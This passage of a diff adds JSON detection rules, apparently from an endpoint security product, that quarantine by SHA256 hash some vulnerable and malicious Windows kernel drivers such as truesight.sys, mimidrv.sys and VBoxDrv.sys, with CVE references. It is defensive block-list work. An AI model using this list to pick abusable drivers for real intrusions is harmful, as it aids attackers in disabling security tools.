+ "last_update": "2026-03-23T11:45:29.615468Z", + "creation_date": "2026-03-23T11:45:29.615470Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6bed7f1304c6785a06064b04e0e3cb55384588f18ea2fc348a6fcd5784f47558", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f12e2a70-d771-5ff9-9fda-47f9f2b54240", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156826Z", + "creation_date": "2026-03-23T11:45:31.156828Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bef75f86c7f13b273f45d3bfd16f5875e1a77b5c6932c48eb1aa3729d06913b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f13fad44-f5c3-5f61-a012-bd27aeab9bb7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495208Z", + "creation_date": "2026-03-23T11:45:31.495212Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495221Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "407b5dbd822eea9b5b3edd0cb655f32a46456556fe093782ea97008a489e1f10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f15b1e12-8ff9-51bd-ac87-1d0072064ad0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608509Z", + "creation_date": "2026-03-23T11:45:29.608511Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608517Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c26b51b4c37330800cff8519252e110116c3aaade94ceb9894ec5bfb1b8f9924", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f16e2754-36a2-56b0-8917-0ca513a9787b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464274Z", + "creation_date": "2026-03-23T11:45:30.464277Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464295Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ddf427ce55b36db522f638ba38e34cd7b96a04cb3c47849b91e7554bfd09a69a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f174fe92-7627-5b5a-b372-18523243d89c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977671Z",
+ "creation_date": "2026-03-23T11:45:29.977674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977683Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427",
+ "comment": "Malicious Kernel Driver (aka ndislan.sys) [https://www.loldrivers.io/drivers/ca1e8664-841f-4e4b-9e67-3f515cc249c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f17a2fde-af7e-51b3-a83e-26cf8ccc52b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822562Z",
+ "creation_date": "2026-03-23T11:45:31.822564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38980f591007022c8f68c2eabf2aa3cafc10c0e9c309d55b72caeb800b6b9cb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1807d93-e4bc-56b6-b0d4-020298ed4860",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140889Z",
+ "creation_date": "2026-03-23T11:45:31.140891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140897Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdc25ef91df92c829a9c6a84d113c9d2aba8a2d0e8f4216811b65b24545849a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f18c26ff-19aa-5bb8-93f3-1f86c2ad22dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151126Z",
+ "creation_date": "2026-03-23T11:45:31.151128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "096b82775ee0664258be2fdbed5010df114b58bbdd5c6d2d13c19d2ad3304c3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f18d4bae-38cb-57c7-a551-61d373e887d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828772Z",
+ "creation_date": "2026-03-23T11:45:30.828774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3feab99a4a150a7eac92105a60ce736a73c84959e7c219e7609e080e389e21f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f191ff4f-7a22-52d1-b856-c97c51254e3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473172Z",
+ "creation_date": "2026-03-23T11:45:31.473176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2728b3f04b4a6bbfcdeeecdf37658ed19efc51801b4e7bde68c874db10a5115",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f19c9e47-a87b-512a-97ef-ddc138101834",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478731Z",
+ "creation_date": "2026-03-23T11:45:30.478734Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3de38ef40dbda07a537a7e48cb5d59dbd17bf27d5d399b32df737cd67c0cdb25",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f19fb2c4-a6c1-5285-97f0-6b468e58cceb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815561Z",
+ "creation_date": "2026-03-23T11:45:31.815563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14d4cb61507001029e0a38335390e1c5f67b367265fb121444bc1cedd7fc2180",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1aa4c15-bb4d-5d04-a94f-e9c64a3c7d16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474146Z",
+ "creation_date": "2026-03-23T11:45:30.474150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e05b62738ebb09250227e87908d67a3fc74e4c684d5a86ef935243a6f0e06792",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1b05792-b635-5a2f-bfbd-80e45e738dba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146438Z",
+ "creation_date": "2026-03-23T11:45:31.146440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dc643b646da999eac18f03008f15fc7a7b3fd5595421c414030f41d779a7fee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1b2f70b-c231-5b16-854a-5616cbf61ca8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817587Z",
+ "creation_date": "2026-03-23T11:45:31.817589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bfeefddca836d1ed653f58afb55c1de163ad9ad16ae2d4dd773689215700c36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1bd710a-5125-5dd5-a15b-063fb78c0367",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481743Z",
+ "creation_date": "2026-03-23T11:45:31.481747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481757Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1639041f4e68b08a44878dd42ea8f9123bfb61a7e551ecc4588aa15c9a108d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1bdc46f-a13c-5c02-85c2-286df9d3f7bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612674Z",
+ "creation_date": "2026-03-23T11:45:29.612679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e64c1bbaa6b5dba3f3795f5932511f8f8a49d68d420267896e2e4e51b9d46bc",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1c3031c-2d8f-5415-81c7-7202273e1331",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146726Z",
+ "creation_date": "2026-03-23T11:45:31.146728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3deb79134902ff1594ba01d8b3fe1b8538f6679a5bb226db6445c97b9d824fda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1d5f552-7b6a-5873-ab52-822835dc9a98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619160Z",
+ "creation_date": "2026-03-23T11:45:29.619162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a00b50cc1d95abc3ada635f331c5911d1aaf9ae8b86d359db6fc7f6fc5eb0c94",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1d8e0a5-d166-5b0b-a346-2fb8186c760e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146583Z",
+ "creation_date": "2026-03-23T11:45:32.146585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89036534a3da657882da96d9f211ae41efab4083bd6dbedbeaa2516d1d04cff4",
+ "comment": "Malicious Kernel Driver (aka driver_89036534.sys) [https://www.loldrivers.io/drivers/750a8aa9-a87c-4142-b96b-18ea139ada14/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1db1a3b-5dc5-509d-83de-0402a17b315e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807900Z",
+ "creation_date": "2026-03-23T11:45:31.807904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807912Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0303bcb24f12bf45eb3dc32a339e8beb5a4b9c7061a5d8284c8d08c418ed1945",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1dbd499-5d90-55e9-aae7-9cce5299e54c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150669Z",
+ "creation_date": "2026-03-23T11:45:31.150671Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94955464e5e0c0d8e02fc1a834edb7b6cac474c07f55ada866de19052596ec94",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
